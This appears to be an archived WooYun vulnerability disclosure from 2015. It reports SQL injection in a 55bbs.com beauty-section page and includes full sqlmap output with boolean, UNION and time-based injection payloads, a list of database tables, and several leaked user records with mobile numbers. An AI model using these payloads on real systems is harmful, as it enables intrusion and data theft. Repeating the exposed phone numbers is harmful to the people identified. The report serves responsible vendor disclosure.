乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-17: 细节已通知厂商并且等待厂商处理中 2015-05-18: 厂商已经确认,细节仅向厂商公开 2015-05-19: 厂商已经修复漏洞并主动公开,细节向公众公开
早上骑车时不小心别到旁边宝马的车头,我摔在地上半天缓不过神,车主下车蹲在我身边失望地说:“小兄弟,你这瓷碰的不够专业啊!你躺的地方所照射的阳光并不会让司机瞬盲,而且身体与车头的直线距离太长,很难假造碰撞伤害!”我愣住了,问他为何懂的这么多,他拍拍宝马说:“你以为它是怎么来的?”
activity_1072 activity_1073 activity_1074 activity_1075 activity_1076 activity_1077 activity_1078 activity_1079 activity_1080 activity_1081 activity_1082 activity_1083 activity_1084 activity_1085 activity_1086 activity_1087 activity_1088 activity_1089 activity_1090 activity_1091 activity_1092 activity_1093 activity_1094 activity_1095 activity_1096 activity_1097 activity_1098 activity_1099 activity_1100 activity_1101 activity_1102 activity_1103 activity_1104 activity_1105 activity_1106 activity_1107 activity_1108 activity_1109 activity_1110 activity_1111 activity_1112 activity_1113 activity_1114 activity_1115 activity_1116 activity_1117 activity_1118 activity_1119 activity_1120 activity_1121 activity_1122 activity_1123 activity_1124 activity_1125 activity_1126 activity_1127 activity_1128 activity_1129 activity_1130 activity_1131 activity_1132 activity_1133 activity_1134 activity_1135 activity_1136 activity_1137 activity_1138 activity_1139 activity_1140 activity_1141 activity_1142 activity_1143 activity_1144 activity_1145 activity_1146 activity_1147 activity_1148 activity_1149 activity_1150 activity_1151 activity_1152 activity_1153 activity_1154 activity_1155 activity_1156 activity_1157 activity_1158 activity_1159 activity_1160 activity_1161 activity_1162 activity_1163 activity_1164 activity_1165 activity_1166 activity_1167 activity_1168 activity_1169 activity_1170 activity_1171 activity_1172 activity_1173 activity_1174 activity_1175 activity_1176 activity_1177 activity_1178 activity_1179 activity_1180 activity_1181 activity_1182 activity_1183 activity_1184 activity_1185 activity_1186 activity_1187 activity_1188 activity_1189 activity_1190 activity_1191 activity_1192 activity_1193 activity_1194 activity_1195 activity_1196 activity_1197 activity_1198 activity_1199 activity_1200 activity_1201 activity_1202 activity_1203 activity_1204 activity_1205 activity_1206 activity_1207 activity_1208 activity_1209 activity_1210 activity_1211 activity_1212 activity_1213 activity_1214 activity_1215 activity_1216 activity_1217 activity_1218 activity_1219 activity_122 activity_1220 activity_1221 activity_1222 activity_1223 activity_1224 activity_1225 activity_1226 activity_1227 activity_1228 activity_1229 activity_1230 activity_1231 activity_1232 activity_1233 activity_1234 activity_1235 activity_1236 activity_1237 activity_1238 activity_1239 activity_1240 activity_1241 activity_1242 activity_1243 activity_1244 activity_1245 activity_1246 activity_1247 activity_1248 activity_1249 activity_1250 activity_1251 activity_1252 activity_1253 activity_1254 activity_1255 activity_1256 activity_1257 activity_1258 activity_1259 activity_1260 activity_1261 activity_1262 activity_1263 activity_1264 activity_1265 activity_1266 activity_1267 activity_1268 activity_1269 activity_1270 activity_1271 activity_1272 activity_1273 activity_1274 activity_1275 activity_1276 activity_1277 activity_1278 activity_1279 activity_1280 activity_1281
这种表看了一下都是用户名字信息等。
Data Found: userinfo_id=62889Data Found: Address=Data Found: mobile=13811816153Data Found: userinfo_id=106550Data Found: Address=Data Found: mobile=13910892801Data Found: userinfo_id=150607
随便列几条,由于这种表太多了,我就稍微跑了一点点
F:\Python26\sqlmap>sqlmap.py -u "http://liren.55bbs.com/files/panteneclinicare/show.php?uid=490614" --dbs sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 19:54:11[19:54:11] [WARNING] using 'C:\Users\Administrator\.sqlmap\output' as the output directory[19:54:12] [INFO] resuming back-end DBMS 'mysql'[19:54:12] [INFO] testing connection to the target URL[19:54:12] [INFO] heuristics detected web page charset 'ISO-8859-2'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: uid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: uid=490614' AND 4288=4288 AND 'YuWU'='YuWU Type: UNION query Title: MySQL UNION query (NULL) - 17 columns Payload: uid=-8983' UNION ALL SELECT NULL,CONCAT(0x71796f7471,0x4d6e4d4b7a57666f4566,0x7170637571),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: uid=490614' AND SLEEP(5) AND 'Elkx'='Elkx---[19:54:12] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.2.25, PHP 5.3.27back-end DBMS: MySQL 5.0.11[19:54:12] [INFO] fetching database names[19:54:12] [INFO] the SQL query used returns 3 entries[19:54:12] [INFO] resumed: "information_schema","information_schema"[19:54:12] [INFO] resumed: "55user","55user"[19:54:12] [INFO] resumed: "test","test"available databases [3]:[*] 55user[*] information_schema[*] test[19:54:12] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\liren.55bbs.com'[*] shutting down at 19:54:12
加起来就像紫霞仙子说的一样,应该有上百万,可惜你们没标记是男是女。
过滤
危害等级:高
漏洞Rank:20
确认时间:2015-05-18 11:21
漏洞存在,等待修复
2015-05-19:漏洞已经修复